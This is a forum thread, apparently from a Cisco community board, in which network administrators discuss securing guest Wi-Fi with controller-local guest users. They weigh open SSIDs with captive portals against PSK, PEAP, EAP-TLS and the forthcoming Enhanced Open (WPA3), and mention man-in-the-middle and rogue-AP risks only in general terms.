Thanks, but I'm talking to use the local guest users in the controller, not in a remote LDAP server

Can we use those local guest users in a secure way different from open authentitication with a captive portal?

Thanks

Thanks, but I'm talking about securing the guest access. This document talks about using no-layer 2 security and web portal authentitcation.

Open wifi is never recommended:

https://www.csoonline.com/article/3246984/wi-fi/why-you-should-never-ever-connect-to-public-wifi.html

https://www.europol.europa.eu/activities-services/public-awareness-and-prevention-guides/risks-of-using-public-wi-fi

It's very easy to create MiTM attacks, packet sniffers or fake-rogue AP. After you connect to an open network, your client is going to connect always to that SSID, inside and outside your organization, without authentication, making very easy the work for attackers.

Is it possible Cisco has not another recommendation for guest access?

Thanks

There´s no solution for that currently.  Use a PSK could help partially but the problem it creates is too big. The definitive solution is about to come with something called : "Enhanced Open". 

  Enhanced Open will encrypt all Wireless packet since the beginning of the connection. Clients and AP that will support Enhanced Open, will exchange extra information on the beacons allowing them to establish an encrypted session without users intervention. This will be totally transparent to the users and will definitely solve the open network problem.

 However, we need to wait until the market embrace it. 

-If I helped you somehow, please, rate it as useful.- 

"Enhanced Open" sounds great.

But meanwhile we have to offer solutions. Maybe PEAP could be a solution. It is the same for a guest user introduce his credentials in a captive portal or in the wifi configuration, so I don't understand why Cisco doesn't support that for Guest Users, or it does?

Thanks

PEAP stand for Protected EAP and requires Username and Password on the client side. Any solution that requires username and password or even only password does not apply easily for Guest networks. If you need to touch users devices or if you need previously to inform users about anything, you lost all the benefit of this kind of solution.

 Guest meant to be something easy to handle. But, the price is to face a insecure process while connecting. 

-If I helped you somehow, please, rate it as useful.-

Cisco Wireless Guest Access with captive portal requires an user and password for each client too, but in an open wifi

Yes, it does. All guest portal actually should ask. But, this is totally different. The username and password on the portal is easy to handle. You can prepare the portal so that the user can fill the information and define its own password. Or you can even use social media credentials, which is very fancy. 

 The point I am trying to make here is that by nature, Guest network is insecure and this problem will be solved as I mentioned earlier.

 Here in the company I work for, we banned all kind of authentication different from certificate (EAP-TLS). Even WPA2 the security team prohibited due the vulnerability on the four way hand shake.

 But, for Guest, I don´t see any easy solution for now.

-If I helped you somehow, please, rate it as useful.-

Maybe, PEAP could be a solution

As mentioned above there is currently NO layer 2 encrypted Guest standards. This is partly what WPA3 will solve.

The issue you have using PSK has been discussed, you give everyone the PSK, and they can share with whoever they want, and once authenticated can capture and decode anything on that network.

PEAP has the issue that you need the client device to have the server certificate to validate it, this leads to issues around this, how do you get it on the user device, how do you make sure they validate it etc. 

This is a GUEST network, your Terms and Conditions will protect your company, if thats what your really worried about. This is practically how every company says to do it, and why best practice when connected to a GUEST network is to use a VPN to encrypt your traffic.

Take a look at how APPLE does Guest access - its purely an open SSID, no PSK, no Captive Portal just straight to the internet, no layer 2 encryption. 

Realistically unless your doing EAP-TLS (which would be impossible for Guest, well at least not very user friendly at the very least), I can do a MITM attack against pretty much every other type of security. With a WIFI Pineapple i can probably get 80% of peoples devices to connect to me without even trying.